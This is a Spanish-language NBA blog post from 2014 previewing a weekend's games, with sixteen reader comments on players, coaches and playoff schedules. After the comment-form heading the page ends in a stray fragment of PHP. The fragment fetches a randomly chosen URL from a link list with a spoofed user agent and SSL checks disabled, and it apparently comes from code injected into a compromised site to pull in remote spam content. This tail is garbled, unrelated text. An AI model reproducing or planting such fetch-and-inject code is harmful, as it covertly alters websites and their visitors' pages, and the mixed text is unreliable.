Fin de semana: Cuenta atrás

28 de February de 2014 por TheDeerHunter

Alcanzamos marzo y ya el lunes podremos decir aquello de que queda menos de mes y medio para terminar la regular. Hasta ahora sólo habíamos presenciado el calentamientos. Los aspirantes empiezan a mostrar su verdadera cara y ya no hay partido que sobre. Conforme afrontamos la recta final va creciendo la dosis de emoción.

Hoy mismo veremos jugarse las castañas a muchos gallos del oeste. Los Thunder (2AM) tratarán de romper su mala racha ante unos Grizzlies que continúan escalando y no pueden permitirse perder. Podría ser perfectamente un aperitivo de primera ronda. Los osos además estarán mirando con el rabillo del ojo lo que hacen los Suns que reciben a Pelicans (4:30AM) con ambos equipos plagados de bajas. Además tendremos dos duelos de playoffs interconferencias. Por un lado los Spurs reciben a Bobcats(2:30AM) y por el otro los Mavs hacen lo propio con los Bulls (misma hora). Para completar la agenda, los Warriors pueden terminar de dejar KO a los Knicks, los Cavs tratarán de mantener la escalada ante Jazz y los Lakers vivirán un apasionante duelo directo frente a Kings por la cuchara de madera de la conferencia sin Demarcus Cousins. Para pocos alicientes que tiene el partido…

El sábado encontramos el grueso del menú con hasta 9 choques que nos darán material para nuestros acalorados debates:  Jugarán Rockets, Blazers y Clippers contra Pistons, Nuggets y Pelicans respectivamente. Los Clippers son los que lo tienen más fácil a priori, igual que Miami e Indiana que reciben a Orlando el primero y viajan a Boston los segundos. El resto, equipos que luchan por mantener sus opciones de playoffs como los Wizards que cumplirán trámite en Philadelphia o Nets que harán lo propio en Milwaukee. Los Cavs lo tendrán más difícil en Memphis  ambos equipos de back to back). Por su parte, los Wolves viajarán a Sacramento.

El domingo llegan más bombazos.Tarde-noche con los Knicks que visitan Chicago (7PM) y los Warriors que se van a Toronto (10PM). Después 3 cocos en acción: Pacers reciben a Jazz pero Thunder y Spurs tienen choques complicados frente a Bobcats y Mavs, respectivamente. Lo bueno para ambos es que juegan en casa. Los Suns continuarán sobreviviendo como puedan ante Hawks y, finalmente, duelo “en la cumbre” entre Sixers y Magic. Aunque hay que decir que la última vez que se enfrentamos estuvo la mar de entretenido.

Comenta

16 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Derrick Williams destrozando a Lakers. Te dedica su 20-10 Deer, y todo lo que haga de aquí hasta que acabe el partido, que aún quedan 15 minutos.

      Citar

  2. Sancho88 dice:
    #2

    Y Farmar me ha dedicado a mí su 8/10 en triples. Después de Kobe Bryant, record junto a Doneyll Marshall con 12 triples, Jordan Farmar es el segundo jugador de los Lakers con más triples conseguidos en un partido. Ante eso… poco que hacer para mis Kings. Un último cuarto apoteósico del burejas. Sus triples volaban como el viento que le azota en una tarde primaveral en sus frondosos y aerodinámicos aparatos auditivos. Menuda exhibición el hijo de puta.

      Citar

  3. Denise dice:
    #3

    Triple doble de Irving 21-10-12 ante los Jazz. La superioridad en el rebote ha sido abismal, 56-31 para los de Mike Brown, que desde la llegada de Deng y de Hawes empiezan a carburar y tienen pinta de poder quitarle la plaza de PO a los Hawks. Eso sí, nuevo partido de Bennet en el banco los 48 minutos y Jack no levanta cabeza.
    Por los Jazz, hay que ver Richard Jefferson que parecía un cadaver putrefacto y su único valor era el ser un jugoso expiring, y al final el puto va a sacarse un buen contrato este verano.
    Y manda huevos que el merluzo de Corbin siga sin darle minutos a Gobert!!.

    Otro triple-doble el de Curry 25-11-11 ante los Knicks. 116 puntos de media llevan encajados los Knicks en sus últimos 5 partidos que se cuentan por derrotas. Y eso que cuentan con un supuesto gran entrenador defensivo…

    Duncan es incombustible el tio, 17-16-6 para liderar a su equipo a la victoria ante Bobcats. Que mal partido de Kemba y eso que no contaba con Parker enfrente. Y a Kidd-Gilchrist ya lo doy por perdido. Otro pick 2 tirado a la basura como el de Marvin Williams, Beasley ó Thabeet.

    ¿Que le pasa a Marc Gasol este año? Su temporada es muy floja, y de seguir con este rendimiento, para mi pasaría a ser un jugador sobrepagado. Su temporada creo que está siendo al final mucho peor que la de su hermano.

    ¿Dragic no estaba lesionado? Joder, ha abierto el box-score y veo que ha metido 40 puntos. Quizás lo he soñado, pero me sonaba que estaba lesionado del tobillo…

      Citar

  4. Ruxixon dice:
    #4

    Yo no me preocuparía porque Marc haya bajado el nivel.Ha tenido una lesión seria cuyos plazos de recuperación ha roto,y posteriormente ha sufrido otra lesión derivada de la primera si no me equivoco,volviendo también antes de plazo.Dejando de lado lo razonable que puede ser o no una vuelta prematura,probablemente haya algo de psicológico y no acabe de estar cómodo en la pista,lo que repercute en su rendimiento.Lo ideal sería que se diera unos días de descanso antes de PO,pero la situación de Memphis este año no invita a ello,así que habrá que esperar a que con el paso de los días vaya encontrándose mejor.

    @sancho: yo también leí lo de Dragic y se decía que era day-to-day.Pero es que también Anthony Davis se había lesionado el hombro en su anterior partido.¿Qué pasó hoy?Partidazo de los 2,jajaj

      Citar

  5. nba dice:
    #5

    Yo creo que es muy pronto para empezar a dar palos a Marc, ya que ha hecho un gran sacrificio por el equipo volviendo antes de tiempo para intentar conseguir puesto de play-off, yo creo que habria que repartir a otros compañeros antes…

      Citar

  6. Sancho88 dice:
    #6

    “Otro triple-doble el de Curry 25-11-11 ante los Knicks. 116 puntos de media llevan encajados los Knicks en sus últimos 5 partidos que se cuentan por derrotas. Y eso que cuentan con un supuesto gran entrenador defensivo…”

    (Ese señor Woodson ni está ni se le espera). Pero me temo que pongan al muñeco que pongan en el banquillo ahora mismo le ocurriría igual. No me gusta nada nada cuando echan a un entrenador y ponen a su ayudante al mando. El desastre Dantoni sigue presente con Woodson, y así les va… para el futuro solo les veo a Tim Hardaway y Carmelo si firma (que no creo ni de coña). Lo demás es mierda. Hablando de entrenadores qué decepción Brian Shaw por dios… quién apuesta a que George Karl con este mismo equipo estaría ahora en 40 victorias? Yo digo que seguro que sí. Shaw es bastante malo ajustando, que es ese arte que se ha inventado Popovich. Shaw no sabe improvisar ni crear ni nada. Otro entrenador malo de cojones es Malone el de los Kings. Ayer los Kings podían haber hecho algo más contra Lakers y dejó toda la segunda parte al paquete de McCallum de 2, y Farmar haciéndole un cuadro renacentista.

    “¿Que le pasa a Marc Gasol este año? Su temporada es muy floja, y de seguir con este rendimiento, para mi pasaría a ser un jugador sobrepagado. Su temporada creo que está siendo al final mucho peor que la de su hermano.”

    No opino lo mismo de Marc. Es un jugador al que no se le debe juzgar por sus números exclusivamente, él es un líder, un base y un entrenador dentro de la pista. Pueden tener algún bache los Grizzlies de aquí al final, pero llevan una buena dinámica desde enero y lo más lógico sería que acabasen siendo octavos. Pero no pueden comenter muchos más errores

      Citar

  7. Esteban dice:
    #7

    Denise:

    Y a Kidd-Gilchrist ya lo doy por perdido. Otro pick 2 tirado a la basura como el de Marvin Williams, Beasley ó Thabeet.

    la verdad no son muchos los partidos que he podido ver MKG, y esta claro que los boxscore no son su fuerte y mucho menos la parte ofensiva, pero he leido comentarios maravillosos sobre su defensa e incluso el entrenador de Menphis lo resalto el otro día y lo comparo con Allen, por las bolas extra que da al equipo gracias a su defensa

      Citar

  8. Denise dice:
    #8

    Esteban: la verdad no son muchos los partidos que he podido verMKG, y esta claro que los boxscore no son su fuerte y mucho menos la parte ofensiva, pero he leido comentarios maravillosos sobre su defensa e incluso el entrenador de Menphis lo resalto el otro día y lo comparo con Allen, por las bolas extra que da al equipo gracias a su defensa

    Tampoco soy yo el que ve muchos partidos de los Bobcats, pero el más reciente que ví, fue el día en que Melo anotó 62 puntos ante los Bobcats y violó literalmente a Kidd Gilchrist. De los 62 puntos, en 25 de ellos estaba directamente siendo defendido por Gilchrist acumulando 11 tiros anotados de 13 intentos ante el sophomore. Eso sí contar las veces que Melo fue al tiro libre por la mala defensa del de los Bobcats.

      Citar

  9. Denise dice:
    #9

    Sobre Marc, no quiero decir que sea del Club Cazo Mix ó que esté sobrevalorado, solo que su temporada es muy floja, ya sea por la lesión o no, el hecho es que es actualmente el 22º mejor pagado de la NBA y creo que hay que exigirle mayor rendimiento, que tire más a canasta y que se eche más veces el equipo a las espaldas.
    De los 34 partidos que lleva, solo en 2 ha superado los 20 puntos, y solo en 4 ha superado los 10 rebotes!!, me parecen números muy pobres para él.

      Citar

  10. Nacho dice:
    #10

    Un poco de tedio y qué mejor que mirar lo que hay de aquí al domingo 16 de marzo en la parte baja de PO Oeste:

    Minny; 28-29

    1. at SAC
    3. at DEN
    5. vs. NYK
    7. vs. DET
    9. vs. TOR
    11. vs. MIL
    14. at CHA
    16. vs. SAC

    Memphis; 32-25
    1. vs. CLE
    3. at WAS
    5. at BKN
    7. at CHI
    8. vs. CHA
    11. vs. POR
    12. at NOP
    14. at TOR
    15. at PHI

    Phoenix; 34-24
    2. vs. ATL
    4. vs. LAC
    6. vs. OKC
    9. at GSW
    10. at. LAC
    12. vs. CLE
    14. at. BOS
    16. at. TOR

    Dallas; 36-24
    2. at. SAS
    5. at.DEN
    7. vs. POR
    9. vs. IND
    11. at GSW
    12. at UTA
    16. at OKC

    Warriors; 36-23
    2. at TOR
    4. at IND
    5. at BOS
    7. vs. ATL
    9. vs.PHX
    11. vs. DAL
    12. at LAC
    14. vs CLE
    16. at POR

    Ufff, da para mucho análisis.

      Citar

  11. Nacho dice:
    #11

    Creo que esta quincena es la última oportunidad para los WOLVES de engancharse al tren de los PO. Tiene de lejos el mejor calendario, con 8 partidos, cinco en casa, y dos rivales de PO, Toronto en Mineápolis y viaje a Charlotte. Además es el único equipo de los cinco que no juega back to back. Deberían terminar 7 a 1 si quieren tener opciones. La tarea, a pesar de lo benigno del calendario es ardua, porque no es un equipo acostumbrado a mantener esas rachas. Si Love y los suyos lo consiguen se ponen 35-30, y seguramente a pocos partidos de PO. Entonces los podremos considerar aspirantes con mayúsculas.
    Probabilidad de acierto, baja.

    Memphis se casca 9 partidos y tres back to back seguidos. Su escalada hacia puestos de PO va a depender mucho de las piernas (y en especial de la rodilla de Marc) de unos jugadores que ya llevan tiempo jugando al límite y con Damocles jugando con las lesiones. Seis partidos son fuera, donde tienen una racha un pelín mejor que en casa. Siete son partidos contra equipos del Este, los seis del batallón de cola de PO si como parece CLE arrebata el último puesto a ATL. POR y NOP los partidos de conferencia. El balance contra el Este invita al optimismo, su mentalidad también. Nueve partidos en quince días con los tres back to back mencionados es el hándicap. Con un 6-3 se darían con un canto en los dientes. Eso les pondría con 38-28 que si no les mete ya en PO los pone a punto de caramelo.

    Phoenix tiene, junto con Dallas y un poco Warriors, el peor calendario. Ocho partidos, cuatro en casa y cuatro fuera. Solo dos contra rivales que no están en PO, (BOS y CLE o ATL, el que queráis) doblete contra unos enrachados Clippers, duelo directo en la bahía precedido de la visita de Durant and Cía.
    Aquí veremos la disposición de Dragic y sus jugones, porque podrían desinflarse, e incluso salir de puestos de PO. No sería justo. Al esloveno ganas y juego no le faltan, mentalidad balcánica a tope que transmite a sus compañeros, un entrenador que sabe lo que hace y una ciudad que disfruta del basquet y de grandes bases. Cuatro victorias podrían quedarse cortas, pero si luego se analizan bien sabrían a gloria. 38-28 igualados con los osos.

    Dallas. Ocho partidos complicadísimos, los dos a priori más fáciles son las salidas a Denver y a Utah, plazas difíciles siempre. Luego enfrentamientos contra los tres primeros del Oeste y el líder de la competición. y para completar el cuadro también viajan a Oakland. Difícil, muy difícil para Dirk y los suyos. Tres victorias serían buena renta, pero no deberían conformarse con menos de cuatro. Esto les daría un 40-28, para tener que estar muy atentos al retrovisor.

    Golden State también tiene un calendario de aúpa, con nueve partidos, cinco salidas complicadas con únicamente la de Boston como algo plácida. Recibe a dos de sus rivales y luego a los dos equipos que se juegan la 8ª plaza del Este. Invitados de honor a esta serie por los PO del Oeste.Entre otras cosas veremos un Curry vs. Irving, que se hace más interesante después del triple doble que se cascaron ambos anoche. Ese duelo será el viernes 14, igual se han clarificado las cosas para los warriors en esa fecha, pero lo dudo. Un 4/5 o un 5/4 pueden ser los resultados más probables, pero no se pueden permitir la primera de las hipótesis. Quedarían entonces con un 41-27, todavía al mando del grupetto, pero aún con el cuchillo entre los dientes.

    Pues esto ha sido parte de mi tarde de sábado. Mi basket ficción dejaría la cosa así:
    GSW 41 27
    DAL 40 28
    PHX 38 28
    MEM 38 28
    MIN 35 30

    Es decir, las cosas más apretadas para el último mes.

      Citar

  12. Vader dice:
    #12

    @Nacho

    Tremendo análisis!!!

      Citar

  13. Denise dice:
    #13

    En el duelo estrella anoche de la NCAA. OKlahoma St. le ganó a Kansas de 7, con 21-5-6-4 de Smart pero con malos porcentajes de tiro en la primera parte. Por Kansas, Embiid se posiciona como nº1 del Draft con su 13-13 y un 5/5 en tiros libres, qué importante es esto para un center!. En cambio Wiggins, 15-7 pero con un 5/16 en tiros y 6 perdidas de balón.

      Citar

  14. Ruxixon dice:
    #14

    El momento de la noche NBA:

    https://www.youtube.com/watch?v=11AwgKQobF0

      Citar

  15. rumbero dice:
    #15

    Que grande Nacho. Muy fino el análisis.
    La verdad es que va a estar muy bonita esta lucha. Veremos si los Suns pueden contar con Bledsoe más pronto que tarde para echarles una mano, que los venimos quitando de puestos de PO desde noviembre y ahí siguen. Se lo merecen. Y sí, los Grizzlies parece que van a tener que darlo todo. Joerger ya ha borrado de la rotación a Davis y Leuer que cumplieron más que bien durante la lesión de Marc, y éste y Randolph se van a pegar minutadas hasta el final con lo que eso supone.

    PD: Noah 10 asistencias al descanso contra los Knicks. Más 11 puntos y 8 rebotes. Tremendo como viene jugando

      Citar

  16. Vader dice:
    #16

    Siempre da gusto ver jugar a los Bulls, por lo menos para mi que me gustan los equipos con oficio. Thibodeau logra imprimir ese carácter al equipo aún habiendo perdido este año a Rose y Leng.

    Primer cuarto perfecto de Chicago que deja el partido listo para sentencia. Noah dando un clínic y logrando su quinto triple doble (Ya sólo Jordan y Pippen tienen más triples dobles en los Bulls, palabras mayores). El pívot de los Bulls repartiendo juego desde la cabeza de la bombilla y los aleros haciendo bloqueos sencillos y puertas atrás durante todo el partido. Los Knicks eran incapaces de defender la misma jugada durante todo el partido…

    Si ese primer cuarto hubiera ocurrido el año pasado igual los Knicks habrían podido remontar. Pero este año no tienen la fortaleza mental ni el oficio defensivo para remontar desventajas tan grandes contra equipos del oficio de los Bulls. Si yo fuera Carmelo me hubiera gustado jugar con el otro uniforme y quien sabe, quizás lo haga el año que viene…

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>